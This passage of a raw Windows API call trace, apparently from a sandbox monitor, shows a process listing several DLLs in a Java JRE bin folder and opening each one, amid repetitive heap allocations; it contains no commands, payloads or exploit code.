0x4df50 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.010] AreFileApisANSI () returned 1 [0091.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0091.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 58 [0091.011] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x97440)) returned 1 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0091.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.011] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x26a40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hprof.dll", cAlternateFileName="")) returned 1 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0091.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0091.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0091.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.012] AreFileApisANSI () returned 1 [0091.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll", lpUsedDefaultChar=0x0) returned 49 [0091.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0091.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0091.012] AreFileApisANSI () returned 1 [0091.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0091.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x45e88 [0091.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 49 [0091.012] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.012] GetFileType (hFile=0x418) returned 0x1 [0091.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0091.012] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.013] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.013] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.013] CloseHandle (hObject=0x418) returned 1 [0091.013] AreFileApisANSI () returned 1 [0091.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0091.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46828 [0091.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 49 [0091.013] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.013] GetFileType (hFile=0x418) returned 0x1 [0091.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0091.014] CloseHandle (hObject=0x418) returned 1 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.015] AreFileApisANSI () returned 1 [0091.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x460b8 [0091.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 49 [0091.015] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x26a40)) returned 1 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0091.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.015] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e240, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="instrument.dll", cAlternateFileName="INSTRU~1.DLL")) returned 1 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0091.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0091.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0091.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0091.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0091.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0091.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0091.016] AreFileApisANSI () returned 1 [0091.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll", lpUsedDefaultChar=0x0) returned 54 [0091.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0091.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0091.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0091.016] AreFileApisANSI () returned 1 [0091.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0091.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75d50 [0091.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 54 [0091.016] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.017] GetFileType (hFile=0x418) returned 0x1 [0091.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0091.017] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.017] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.017] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.017] CloseHandle (hObject=0x418) returned 1 [0091.017] AreFileApisANSI () returned 1 [0091.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0091.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76278 [0091.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 54 [0091.017] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.018] GetFileType (hFile=0x418) returned 0x1 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0091.018] CloseHandle (hObject=0x418) returned 1 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: 